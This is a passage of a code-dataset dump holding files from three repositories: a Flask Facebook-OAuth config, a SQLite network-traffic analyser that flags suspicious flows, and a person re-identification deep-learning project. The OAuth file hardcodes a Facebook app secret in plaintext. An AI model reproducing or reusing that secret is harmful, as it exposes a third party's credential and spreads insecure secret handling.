"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 56, "num_lines": 15, "path": "/_auth.py", "repo_name": "DapperDan2520/MyWay2015", "src_encoding": "UTF-8", "text": "from flask_oauth import OAuth\n\noauth = OAuth()\nfb_app_id = 1720905058133337\nfb_app_secret = \"50ba8c6da2dd383352131cd4b5fc4cf1\"\n\nfacebook = oauth.remote_app('facebook',\n\t\tbase_url='localhost:5000',\n\t\trequest_token_url=None,\n\t\taccess_token_url='/oauth/access_token',\n\t\tauthorize_url='https://www.facebook.com/dialog/oauth',\n\t\tconsumer_key=fb_app_id,\n\t\tconsumer_secret=fb_app_secret,\n\t\trequest_token_params={'scope': 'email'}\n\t)" } ]
4
babette-wh/Developa
https://github.com/babette-wh/Developa
e78379e35f7f4b76d1bb487769f3ac6da3808883
d82afa64ef7b2d92927240b8a8f9c293989931ba
efdf6f670ef4a40267a6d8b06b126467dc7126c7
refs/heads/master
2023-04-17T15:23:51.435648
2021-04-30T08:28:54
2021-04-30T08:28:54
294,772,691
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6005737781524658, "alphanum_fraction": 0.6160211563110352, "avg_line_length": 41.581729888916016, "blob_id": "531f2efcdfaabb848958b66f49a3efd25c3b373c", "content_id": "125d5df58107d9e18cc80888aa9728b3650e2e1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9063, "license_type": "no_license", "max_line_length": 207, "num_lines": 208, "path": "/main.py", "repo_name": "babette-wh/Developa", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 18 01:29:10 2021\r\n\r\n@author: Malin Spørck\r\n\"\"\"\r\n\r\nimport bz2\r\nimport sqlite3\r\nimport datetime\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\n\r\ndef print_explanation():\r\n print(\r\n''' \r\n------------------------------------------------------------------------\r\nThis application opens file1 with Traffic Data arranged in the following sequence:\r\nTime, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes\r\n \r\nIt connects to an sqlite database, inserts data from the traffic data file into the database in the table \"Network_Traffic\"\r\n \r\nThe application also runs queries in the database to analyze trafficdata and change status in entries of traffic that looks suspicious, based on conditions set in the database table \"Criteria\"\r\n \r\nMenu:\r\n \r\n 1: Read data from file and store data in database\r\n - Input parameter: number of lines to read from file (100000 elements is recomended)\r\n 2: Run Check For Suspicious Traffic \r\n 3: Create report over suspicious data and store to Report_dd.month-yyyy_hh.mm.pdf \r\n 4: Create charts over suspicious data and store them as .png images \r\n 0: Exit\r\n------------------------------------------------------------------------\r\n''')\r\n \r\n\"\"\"\r\nChecks for suspicious traffic based on criterias described in Criteria SQL table\r\nToDo: Must create checkers so that we do not register duplicates in the database, before calling Readfile\r\n\"\"\"\r\ndef RunCheckForSuspiciousTraffic():\r\n print(\"\\nRuning check(s) for suspicious traffic...\")\r\n try:\r\n cursor = conn.cursor() \r\n criterias = []\r\n for row in cursor.execute('SELECT SQL from Criteria'):\r\n \"\"\"Stripping down sql string for unwanted characters\"\"\"\r\n SQL_Criteria = str(row).replace('(\"',\"\").replace(')\",',\"\")\r\n criterias.append(SQL_Criteria)\r\n \r\n for elements in criterias:\r\n print(\"sql \" + elements) \r\n cursor.execute(elements) \r\n conn.commit() \r\n \r\n except Exception as err:\r\n print ('Query Failed: %s\\nError: %s' % (\"SQL\", str(err)))\r\n \r\n finally:\r\n cursor.close()\r\n \"\"\" print ('Closing the connection')\"\"\"\r\n \r\n\"\"\"\r\nNewItem(Time, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes):\r\nThis function is used to store data from the input file to SQLITE database. \r\n\"\"\" \r\ndef NewItem(Time, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes):\r\n try:\r\n cursor = conn.cursor()\r\n cursor.execute('''INSERT INTO Network_Traffic (Time, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes) \r\n VALUES (?,?,?,?,?,?,?,?,?,?,?) ;''',(Time, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes)) \r\n except Exception as err:\r\n print ('Query Failed: %s\\nError: %s' % (\"SQL\", str(err)))\r\n else:\r\n NewId = cursor.execute('SELECT last_insert_rowid();').fetchone()[0]\r\n \"\"\"print('New record inserted with id ' + str(NewId))\"\"\"\r\n finally:\r\n cursor.close()\r\n \"\"\" print ('Closing the connection')\"\"\"\r\n\"\"\"\r\nReadFile(filename, numb_lines):\r\nUsed to create reade .bz2 file and store items in SQLITE database, by callling the function \r\nNwewItem(,,,) with the parameters from the input file\r\nWhen the file has been read and the data has been added to the database, \r\nthe function exits after committing the changes to the database \r\n\r\nCode created with inspiration from\r\nAnon., 2021. Reading first lines of bz2 files in python - Stack Overflow. [online] Available at:\r\n<https://stackoverflow.com/questions/37172679/reading-first-lines-of-bz2-files-in-python> \r\n[Accessed 30 April 2021].\r\n\r\nObtaining the bz2 file we used as dataset\r\nAnon., 2021. Unified Host and Network Data Set - Cyber Security Research. [online] Available at:\r\n<https://csr.lanl.gov/data/2017/> \r\n[Accessed 30 April 2021].\r\n\"\"\" \r\ndef ReadFile(filename, numb_lines): \r\n print(\"Reading file...\") \r\n source_file = bz2.open(filename, \"r\")\r\n count = 0\r\n \r\n for line in source_file:\r\n \r\n if(count < int(numb_lines)):\r\n x = str(line).replace(\"b'\",\"\")\r\n y = str(x).replace(\"\\\\n\",\"\")\r\n yy = str(y).replace(\"Port\",\"\")\r\n zz = str(yy).replace(\"'\",\"\")\r\n z = str(zz).split(\",\") \r\n NewItem(z[0], z[1], z[2], z[3], z[4], z[5], z[6], z[7], z[8], z[9], z[10])\r\n else: \r\n break\r\n count += 1\r\n read_count = int(numb_lines)/10\r\n if(count%read_count == 1 and count > 1):\r\n print(str(int(count/read_count)*10) + \"%\")\r\n \r\n conn.commit()\r\n print(\"Data stored in database\")\r\n\"\"\"\r\nCreateReport(sql):\r\nUsed to create report and store result in .pdf file (Report_dd.month-yyyy_hh.mm.pdf )\r\nCode created with inspiration from\r\nAnon., 2021. How do I plot only a table in Matplotlib? - Stack Overflow. [online] Available at: \r\n<https://stackoverflow.com/questions/32137396/how-do-i-plot-only-a-table-in-matplotlib> \r\n[Accessed 30 April 2021].\r\n\"\"\" \r\ndef CreateReport(sql): \r\n print(\"Creating report...\")\r\n cursor.execute(sql)\r\n rows = cursor.fetchall()\r\n\r\n df = pd.DataFrame(rows, columns = (\"ID\", \"Time\", \"Duration\", \"SrcDevice\", \"DstDevice\", \"Protocol\", \"SrcPort\", \"DstPort\", \"SrcPackets\", \"DstPackets\", \"SrcBytes\", \"DstBytes\", \"Status\"))\r\n \r\n fig, ax =plt.subplots(figsize=(12,5))\r\n ax.axis('tight')\r\n ax.axis('off')\r\n the_table = ax.table(cellText=df.values,colLabels=df.columns,loc='center')\r\n\r\n x = datetime.datetime.now()\r\n\r\n pp = PdfPages(\"Report_\" + str(x.strftime(\"%d.%B-%Y_%H.%M\")) + \".pdf\")\r\n pp.savefig(fig, bbox_inches='tight')\r\n pp.close()\r\n \r\n print(\"Report created \" + \" Report_\" + str(x.strftime(\"%d.%B-%Y_%H.%M\")) + \".pdf\")\r\n\r\n\"\"\"\r\nCreateChart(sql, filename, X, Y):\r\nUsed to create charts and store result to .png files\r\nCode created with inspiration from\r\nAnon., 2021. Pandas Dataframe: Plot Examples with Matplotlib and Pyplot. [online] Available at: \r\n<http://queirozf.com/entries/pandas-dataframe-plot-examples-with-matplotlib-pyplot> \r\n[Accessed 30 April 2021].\r\n\"\"\"\r\ndef CreateChart(sql, filename, X, Y):\r\n print(\"Creating chart \" + X + \"...\") \r\n cursor.execute(sql)\r\n rows = cursor.fetchall()\r\n\r\n df = pd.DataFrame(rows, columns = (\"ID\", \"Time\", \"Duration\", \"SrcDevice\", \"DstDevice\", \"Protocol\", \"SrcPort\", \"DstPort\", \"SrcPackets\", \"DstPackets\", \"SrcBytes\", \"DstBytes\", \"Status\", Y))\r\n \r\n ax = plt.gca()\r\n df.plot(kind='bar',x=X,y=Y, figsize=(15, 15))\r\n plt.xlabel(X) \r\n \r\n plt.savefig(filename) \r\n \r\n print(\"Chart created \" + filename + \"\\n\") \r\n\r\n\"\"\"Connection to database\"\"\"\r\nconn = sqlite3.connect('NetworkAnalyzerDatabase.db')\r\ncursor = conn.cursor()\r\n\r\n\"\"\"\r\nPrinting menu\r\n\"\"\"\r\nrunning = True\r\nwhile (running):\r\n print_explanation()\r\n option = input(\"Enter choice: \")\r\n \r\n if option.isdigit():\r\n if(int(option)==1):\r\n numb_lines = input(\"Number of lines to read from file: \")\r\n ReadFile(\"Traffic_Data.crdownload\", numb_lines)\r\n elif(int(option)==2): \r\n RunCheckForSuspiciousTraffic()\r\n \r\n elif(int(option)==3):\r\n sql = \"select * from Network_Traffic where Status = 'Suspicious' limit 100\"\r\n CreateReport(sql)\r\n elif(int(option)==4): \r\n \"\"\"Number of attempted tries to communicate on the different commonly abused ports\"\"\"\r\n sql = \"select *, count(DstPort) from Network_Traffic where Status = 'Suspicious' group by dstport order by dstport\"\r\n CreateChart(sql, \"chart1.png\", \"DstPort\", \"Number_of_communications\")\r\n \r\n \"\"\"Number of attemted tries to communicate on the different commonly abused ports ordered by which computter the attemts is on. limited to the 10 computers with the most attempts\"\"\"\r\n sql = \"select *, count(DstPort) from Network_Traffic where Status = 'Suspicious' group by dstdevice order by count(DstPort) desc limit 20\"\r\n CreateChart(sql, \"chart2.png\", \"DstDevice\", \"Number_of_communications\")\r\n \r\n \"\"\"Number of attemted tries to communicate on the different commonly abused ports ordered by which computter that attemted the communication. limited to the 10 computers with the most attempts\"\"\"\r\n sql = \"select *, count(DstPort) from Network_Traffic where Status = 'Suspicious' group by srcdevice order by count(DstPort) desc limit 20\"\r\n CreateChart(sql, \"chart3.png\", \"SrcDevice\", \"Number_of_communications\") \r\n elif(int(option)==0):\r\n running = False \r\ncursor.close()" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 17, "blob_id": "611ffddc53df9a36bedd6c44b2d7f2aab780f207", "content_id": "d71b56bc418d8a38b556e0a1adffb9629a04e125", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 36, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/README.md", "repo_name": "babette-wh/Developa", "src_encoding": "UTF-8", "text": "# Developa\nNetwork traffic analysis\n" } ]
2
SWRDFK/Comp_ReID-master
https://github.com/SWRDFK/Comp_ReID-master
89b5928a6ec2714426c84fc38e5b497616efa342
4d373c9d136817b1ccba7c8cd47ce19650166515
9de9812709b469062cc71ef3b4d1534e0df1bc2f
refs/heads/master
2022-01-04T14:34:22.929878
2019-12-14T09:02:17
2019-12-14T09:02:17
225,010,781
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5283078551292419, "alphanum_fraction": 0.5645797252655029, "avg_line_length": 32.451087951660156, "blob_id": "747b94a64ebaef4ad41344ae7dcff4fb27df7777", "content_id": "ad53428b41578ce9467d992124159cd92f2ce370", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6341, "license_type": "no_license", "max_line_length": 105, "num_lines": 184, "path": "/core/resnet_SA.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "from __future__ import absolute_import\r\nimport math\r\nfrom torch import nn\r\nfrom torch.nn import functional as F\r\nfrom torch.nn import init\r\nimport torchvision\r\nimport torch\r\nfrom .resnet_ibn_a import resnet50_ibn_a, resnet101_ibn_a\r\n\r\n\r\n# Spatial Attention\r\nclass SpatialAttention(nn.Module):\r\n def __init__(self):\r\n super(SpatialAttention, self).__init__()\r\n\r\n def forward(self, x):\r\n x = x.mean(1, keepdim=True)\r\n h = x.size(2)\r\n w = x.size(3)\r\n x = x.view(x.size(0), -1)\r\n z = x\r\n for b in range(x.size(0)):\r\n z[b] /= torch.sum(z[b])\r\n z = z.view(x.size(0), 1, h, w)\r\n return z\r\n\r\n\r\nclass ResNet_SA(nn.Module):\r\n __factory = {\r\n 18: torchvision.models.resnet18,\r\n 34: torchvision.models.resnet34,\r\n 50: torchvision.models.resnet50,\r\n 101: torchvision.models.resnet101,\r\n 152: torchvision.models.resnet152,\r\n '50a': resnet50_ibn_a,\r\n '101a': resnet101_ibn_a\r\n }\r\n\r\n def __init__(self, depth, pretrained=True, cut_at_pooling=False,\r\n num_features=0, norm=False, dropout=0, num_classes=0):\r\n super(ResNet_SA, self).__init__()\r\n self.pretrained = pretrained\r\n self.depth = depth\r\n self.cut_at_pooling = cut_at_pooling\r\n # Construct base(pretrained) resnet\r\n if depth not in ResNet_SA.__factory:\r\n raise KeyError(\"Unsupported depth:\", depth)\r\n\r\n self.resnet = ResNet_SA.__factory[depth](pretrained=pretrained)\r\n self.resnet.layer4[0].conv2.stride = (1, 1)\r\n self.resnet.layer4[0].downsample[0].stride = (1, 1)\r\n self.base = nn.Sequential(\r\n self.resnet.conv1, self.resnet.bn1, self.resnet.maxpool, # no relu\r\n self.resnet.layer1, self.resnet.layer2, self.resnet.layer3, self.resnet.layer4)\r\n\r\n self.gap = nn.AdaptiveAvgPool2d(1)\r\n\r\n if not self.cut_at_pooling:\r\n self.num_features = num_features\r\n self.norm = norm\r\n self.dropout = dropout\r\n self.has_embedding = num_features > 0\r\n self.num_classes = num_classes\r\n\r\n out_planes = self.resnet.fc.in_features\r\n\r\n # Append new layers\r\n if self.has_embedding:\r\n self.feat = nn.Linear(out_planes, self.num_features)\r\n self.feat_bn = nn.BatchNorm1d(self.num_features)\r\n init.kaiming_normal_(self.feat.weight, mode='fan_out')\r\n init.constant_(self.feat.bias, 0)\r\n else:\r\n # Change the num_features to CNN output channels\r\n self.num_features = out_planes\r\n self.feat_bn = nn.BatchNorm1d(self.num_features)\r\n self.feat_bn.bias.requires_grad_(False)\r\n # if self.dropout > 0:\r\n # self.drop = nn.Dropout(self.dropout)\r\n if self.num_classes > 0:\r\n self.classifier = nn.Linear(self.num_features, self.num_classes, bias=False)\r\n init.normal_(self.classifier.weight, std=0.001)\r\n init.constant_(self.feat_bn.weight, 1)\r\n init.constant_(self.feat_bn.bias, 0)\r\n\r\n # For Spatial Attention\r\n self.SA = SpatialAttention()\r\n self.local_conv_layer1 = nn.Conv2d(256, self.num_features, kernel_size=1, padding=0, bias=False)\r\n self.local_conv_layer2 = nn.Conv2d(512, self.num_features, kernel_size=1, padding=0, bias=False)\r\n self.local_conv_layer3 = nn.Conv2d(1024, self.num_features, kernel_size=1, padding=0, bias=False)\r\n\r\n if not pretrained:\r\n self.reset_params()\r\n\r\n\r\n def forward(self, x):\r\n\r\n x = self.resnet.conv1(x)\r\n x = self.resnet.bn1(x)\r\n x = self.resnet.maxpool(x)\r\n x_layer1 = self.resnet.layer1(x)\r\n x_layer2 = self.resnet.layer2(x_layer1)\r\n x_layer3 = self.resnet.layer3(x_layer2)\r\n x_layer4 = self.resnet.layer4(x_layer3)\r\n\r\n x_attn1 = self.SA(x_layer1)\r\n x_attn2 = self.SA(x_layer2)\r\n x_attn3 = self.SA(x_layer3)\r\n\r\n x_layer1 = x_layer1 * x_attn1\r\n x_layer2 = x_layer2 * x_attn2\r\n x_layer3 = x_layer3 * x_attn3\r\n\r\n x_layer1 = self.gap(x_layer1)\r\n x_layer1 = self.local_conv_layer1(x_layer1)\r\n x_layer1 = x_layer1.view(x_layer1.size(0), -1)\r\n x_layer1 = self.feat_bn(x_layer1)\r\n x_layer1 = self.classifier(x_layer1)\r\n\r\n x_layer2 = self.gap(x_layer2)\r\n x_layer2 = self.local_conv_layer2(x_layer2)\r\n x_layer2 = x_layer2.view(x_layer2.size(0), -1)\r\n x_layer2 = self.feat_bn(x_layer2)\r\n x_layer2 = self.classifier(x_layer2)\r\n\r\n x_layer3 = self.gap(x_layer3)\r\n x_layer3 = self.local_conv_layer3(x_layer3)\r\n x_layer3 = x_layer3.view(x_layer3.size(0), -1)\r\n x_layer3 = self.feat_bn(x_layer3)\r\n x_layer3 = self.classifier(x_layer3)\r\n\r\n x_layer4 = self.gap(x_layer4)\r\n x_layer4 = x_layer4.view(x_layer4.size(0), -1)\r\n features = self.feat_bn(x_layer4)\r\n cls_score = self.classifier(features)\r\n\r\n return features, (x_layer1, x_layer2, x_layer3, cls_score)\r\n\r\n\r\n def reset_params(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n init.kaiming_normal_(m.weight, mode='fan_out')\r\n if m.bias is not None:\r\n init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n init.constant_(m.weight, 1)\r\n init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.BatchNorm1d):\r\n init.constant_(m.weight, 1)\r\n init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.Linear):\r\n init.normal_(m.weight, std=0.001)\r\n if m.bias is not None:\r\n init.constant_(m.bias, 0)\r\n\r\n\r\n\r\ndef resnet18(**kwargs):\r\n return ResNet_SA(18, **kwargs)\r\n\r\n\r\ndef resnet34(**kwargs):\r\n return ResNet_SA(34, **kwargs)\r\n\r\n\r\ndef resnet50(**kwargs):\r\n return ResNet_SA(50, **kwargs)\r\n\r\n\r\ndef resnet101(**kwargs):\r\n return ResNet_SA(101, **kwargs)\r\n\r\n\r\ndef resnet152(**kwargs):\r\n return ResNet_SA(152, **kwargs)\r\n\r\n\r\ndef resnet_ibn50a(**kwargs):\r\n return ResNet_SA('50a', **kwargs)\r\n\r\n\r\ndef resnet_ibn101a(**kwargs):\r\n return ResNet_SA('101a', **kwargs)\r\n\r\n" }, { "alpha_fraction": 0.679798424243927, "alphanum_fraction": 0.7169033288955688, "avg_line_length": 37.29824447631836, "blob_id": "1dca47f8b668543577f65cdd97871815ac0bafa7", "content_id": "2c0441a0714866e81ae33f06a195f5cacba7de48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2223, "license_type": "no_license", "max_line_length": 153, "num_lines": 57, "path": "/README.md", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "# Comp_ReID-master\nCode for 2019 NAIC Person ReID Stage.1\n\n# Installation\n* python==3.6.9\n* torch==0.4.1\n* torchvision==0.2.2\n* numpy==1.17.3\n* Pillow==6.2.1\n\n# Preparation\n1. Run `git clone https://github.com/SWRDFK/Comp_ReID-master.git`\n2. Prepare dataset: \n download the competition datasets and make sure the directory as following: \n &emsp;|—— dataset/ \n &emsp;|&emsp;&emsp;&ensp;|—— gallery_b/ \n &emsp;|&emsp;&emsp;&ensp;|—— query_b/ \n &emsp;|&emsp;&emsp;&ensp;|—— train_set/ \n &emsp;|&emsp;&emsp;&ensp;|—— train_list.txt \n3. Download ResNet101_ibn_a pretrained models from the following url and put it under the folder \n`$Comp_ReID-master/core/pretrained` \n 链接: https://pan.baidu.com/s/1935MdSvnS1t6qo9TH-nXcQ 提取码: jk3d\n\n# Train\nYou can train the following models respectively.\n\n## Train model A (densenet161_CBL)\nRun `python main.py --mode train --model_name densenet161_CBL`\n\n## Train model B (resnet101a_RLL)\nRun `python main.py --mode train --model_name resnet101a_RLL`\n\n## Train model C (resnet101a_SA)\nRun `python main.py --mode train --model_name resnet101a_SA`\n\n# Test\nYou can download dists, jsons and models from the following url and put it under the folder `$Comp_ReID-master/output` \n链接: https://pan.baidu.com/s/1sNZf2WD895KsFkh6HrhkSA 提取码: x5k6\n\nAfter training, you can test with your trainde models or directly use our models. \n\nAfter testing, it will generate two files for each model: \n&emsp;1. the distance matrix between query and gallery named `\"model_name\".npy`, saved in `$Comp_ReID-master/output/dists`. \n&emsp;2. the uploading json file for evaluation named `\"model_file\".json`, saved in `$Comp_ReID-master/output/jsons`. \n\n## Test model A (densenet161_CBL) \nRun `python main.py --mode test --model_name densenet161_CBL`\n\n## Test model B (resnet101a_RLL) \nRun `python main.py --mode test --model_name resnet101a_RLL`\n\n## Test model C (resnet101a_SA) \nRun `python main.py --mode test --model_name resnet101a_SA`\n\n# Ensemble\nYou can test the ensemble model by using three distance matrices and get the generated `ensemble.json` which saved in `$Comp_ReID-master/output/jsons`. \nRun `python main.py --mode ensemble`\n" }, { "alpha_fraction": 0.8157894611358643, "alphanum_fraction": 0.8157894611358643, "avg_line_length": 74, "blob_id": "0e68607d52ad059c74f21e28994bb47cd449d901", "content_id": "d3752ed6a727a7d76b0b67194fc3840977c97336", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 76, "license_type": "no_license", "max_line_length": 74, "num_lines": 1, "path": "/dataset/README.md", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "Please download the competition datasets and and put it under this folder.\r\n" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.7829457521438599, "avg_line_length": 63.5, "blob_id": "21c9216679edf03da0ef945184289bafae9a9b86", "content_id": "98641b30d07cd4198d55d3a7ac2156fac0d7913e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 139, "license_type": "no_license", "max_line_length": 66, "num_lines": 2, "path": "/output/README.md", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "Please download dists, jsons and models from the following url: \n链接: https://pan.baidu.com/s/1sNZf2WD895KsFkh6HrhkSA 提取码: x5k6\n" }, { "alpha_fraction": 0.7351351380348206, "alphanum_fraction": 0.7405405640602112, "avg_line_length": 22.125, "blob_id": "14dc2e617f044fabc17ab6aeb340496cc04b217f", "content_id": "a39d2ad8bbc49ec03c2776382358699d8f97d194", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 185, "license_type": "no_license", "max_line_length": 29, "num_lines": 8, "path": "/tools/__init__.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "from .classification import *\nfrom .logger import *\nfrom .loss import *\nfrom .meter import *\nfrom .metric import *\nfrom .rerank import *\nfrom .transforms2 import *\nfrom .utils import *\n" }, { "alpha_fraction": 0.6894798874855042, "alphanum_fraction": 0.7014079093933105, "avg_line_length": 29.62275505065918, "blob_id": "d2a8d65c0f53daf740b2ebc0ba811387828b8503", "content_id": "41c07866fe4752dcf53111868a5549feab8af1e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5114, "license_type": "no_license", "max_line_length": 134, "num_lines": 167, "path": "/core/base.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('..')\n\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom bisect import bisect_right\nfrom tools import os_walk, CrossEntropyLabelSmooth, TripletLoss, CBLoss, RankedListLoss\nfrom .densenet import *\nfrom .resnet_factory import *\nfrom .resnet_SA import *\n\n\nclass Base:\n\n\tdef __init__(self, config, loaders):\n\n\t\tself.config = config\n\t\tself.loaders = loaders\n\n\t\t# Data Configuration\n\t\tself.pid_num = config.pid_num\n\t\tself.samples_per_class = loaders.samples_per_class\n\n\t\t# Loss Configuration\n\t\tself.margin = config.margin\n\n\t\t# Logger Configuration\n\t\tself.max_save_model_num = config.max_save_model_num\n\t\tself.output_path = config.output_path\n\t\tself.model_name = config.model_name\n\t\tself.save_dist_path = os.path.join(self.output_path, 'dists/')\n\t\tself.save_json_path = os.path.join(self.output_path, 'jsons/')\n\t\tself.save_model_path = os.path.join(self.output_path, os.path.join(self.model_name, 'models/'))\n\t\tself.save_log_path = os.path.join(self.output_path, os.path.join(self.model_name, 'logs/'))\n\n\t\t# Train Configuration\n\t\tself.base_learning_rate = config.base_learning_rate\n\t\tself.weight_decay = config.weight_decay\n\t\tself.milestones = config.milestones\n\n\t\t# Init Model\n\t\tself._init_device()\n\n\t\tif self.model_name == \"densenet161_CBL\":\n\t\t\tself._init_model1()\n\t\tif self.model_name == \"resnet101a_RLL\":\n\t\t\tself._init_model2()\n\t\tif self.model_name == \"resnet101a_SA\":\n\t\t\tself._init_model3()\n\n\t\tself._init_criterion()\n\t\tself._init_optimizer()\n\n\n\tdef _init_device(self):\n\t\tself.device = torch.device('cuda')\n\n\n\tdef _init_model1(self):\n\t\t# For densenet161_CBL\n\t\tself.model = densenet161(num_classes=self.pid_num, pretrained=True)\n\t\tself.model = nn.DataParallel(self.model).to(self.device)\n\n\n\tdef _init_model2(self):\n\t\t# For resnet101a_RLL\n\t\tself.model = ResNet('101a', num_classes=self.pid_num)\n\t\tself.model = nn.DataParallel(self.model).to(self.device)\n\n\n\tdef _init_model3(self):\n\t\t# For resnet101a_SA\n\t\tself.model = ResNet_SA('101a', num_classes=self.pid_num)\n\t\tself.model = nn.DataParallel(self.model).to(self.device)\n\n\n\tdef _init_criterion(self):\n\t\tself.ide_criterion = CrossEntropyLabelSmooth(self.pid_num)\n\t\tself.triplet_criterion = TripletLoss(self.margin, 'euclidean')\n\t\tself.cb_criterion = CBLoss(self.pid_num, self.samples_per_class, gamma=2)\n\t\tself.ranked_criterion = RankedListLoss(margin=1.3, alpha=2.0, tval=1.0)\n\n\n\tdef _init_optimizer(self):\n\n\t\tparams = []\n\t\tfor key, value in self.model.named_parameters():\n\t\t\tif not value.requires_grad:\n\t\t\t\tcontinue\n\t\t\tlr = self.base_learning_rate\n\t\t\tweight_decay = self.weight_decay\n\t\t\tparams += [{\"params\": [value], \"lr\": lr, \"weight_decay\": weight_decay}]\n\t\tself.optimizer = optim.Adam(params)\n\n\t\tself.lr_scheduler = WarmupMultiStepLR(self.optimizer, self.milestones, gamma=0.1, warmup_factor=0.01, warmup_iters=10)\n\n\n\t# save model as save_epoch\n\tdef save_model(self, save_epoch):\n\n\t\t# save model\n\t\tfile_path = os.path.join(self.save_model_path, 'model_{}.pkl'.format(save_epoch))\n\t\ttorch.save(self.model.state_dict(), file_path)\n\n\t\t# if saved model is more than max num, delete the model with smallest iter\n\t\tif self.max_save_model_num > 0:\n\t\t\troot, _, files = os_walk(self.save_model_path)\n\t\t\tif len(files) > self.max_save_model_num:\n\t\t\t\tfile_iters = sorted([int(file.replace('.pkl', '').split('_')[1]) for file in files], reverse=False)\n\t\t\t\tfile_path = os.path.join(root, 'model_{}.pkl'.format(file_iters[0]))\n\t\t\t\tos.remove(file_path)\n\n\n\t# resume model from resume_epoch\n\tdef resume_model(self, resume_epoch):\n\t\tmodel_path = os.path.join(self.save_model_path, 'model_{}.pkl'.format(resume_epoch))\n\t\tself.model.load_state_dict(torch.load(model_path))\n\t\tprint(('Successfully resume model from {}'.format(model_path)))\n\n\n\t# set model as train mode\n\tdef set_train(self):\n\t\tself.model = self.model.train()\n\n\n\t# set model as eval mode\n\tdef set_eval(self):\n\t\tself.model = self.model.eval()\n\n\nclass WarmupMultiStepLR(torch.optim.lr_scheduler._LRScheduler):\n\n\tdef __init__(self, optimizer, milestones, gamma=0.1, warmup_factor=1.0 / 3, warmup_iters=500, warmup_method=\"linear\", last_epoch=-1):\n\t\tif not list(milestones) == sorted(milestones):\n\t\t\traise ValueError(\n\t\t\t\t\"Milestones should be a list of\" \" increasing integers. Got {}\",\n\t\t\t\tmilestones,\n\t\t\t)\n\n\t\tif warmup_method not in (\"constant\", \"linear\"):\n\t\t\traise ValueError(\n\t\t\t\t\"Only 'constant' or 'linear' warmup_method accepted\"\n\t\t\t\t\"got {}\".format(warmup_method)\n\t\t\t)\n\t\tself.milestones = milestones\n\t\tself.gamma = gamma\n\t\tself.warmup_factor = warmup_factor\n\t\tself.warmup_iters = warmup_iters\n\t\tself.warmup_method = warmup_method\n\t\tsuper(WarmupMultiStepLR, self).__init__(optimizer, last_epoch)\n\n\tdef get_lr(self):\n\t\twarmup_factor = 1\n\t\tif self.last_epoch < self.warmup_iters:\n\t\t\tif self.warmup_method == \"constant\":\n\t\t\t\twarmup_factor = self.warmup_factor\n\t\t\telif self.warmup_method == \"linear\":\n\t\t\t\talpha = float(self.last_epoch) / float(self.warmup_iters)\n\t\t\t\twarmup_factor = self.warmup_factor * (1 - alpha) + alpha\n\t\treturn [\n\t\t\tbase_lr\n\t\t\t* warmup_factor\n\t\t\t* self.gamma ** bisect_right(self.milestones, self.last_epoch)\n\t\t\tfor base_lr in self.base_lrs\n\t\t]\n" }, { "alpha_fraction": 0.7638888955116272, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 26.125, "blob_id": "ec0147d878d85e2df5d8a02551641d7988367d4f", "content_id": "0c0e42960c33cd57c9d725a70840f7bbbfac006c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 216, "license_type": "no_license", "max_line_length": 33, "num_lines": 8, "path": "/core/__init__.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "from .data_loader import Loaders\nfrom .base import Base\nfrom .densenet import *\nfrom .resnet_factory import *\nfrom .resnet_ibn_a import *\nfrom .resnet_SA import *\nfrom .test import *\nfrom .train import train_an_epoch" }, { "alpha_fraction": 0.6400785446166992, "alphanum_fraction": 0.6600809693336487, "avg_line_length": 30.589147567749023, "blob_id": "08d5201c39f25bbfa06be350c62155c61cdbe112", "content_id": "cd1d100f18babb7819a84b59ccc9db0b30a631b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8149, "license_type": "no_license", "max_line_length": 109, "num_lines": 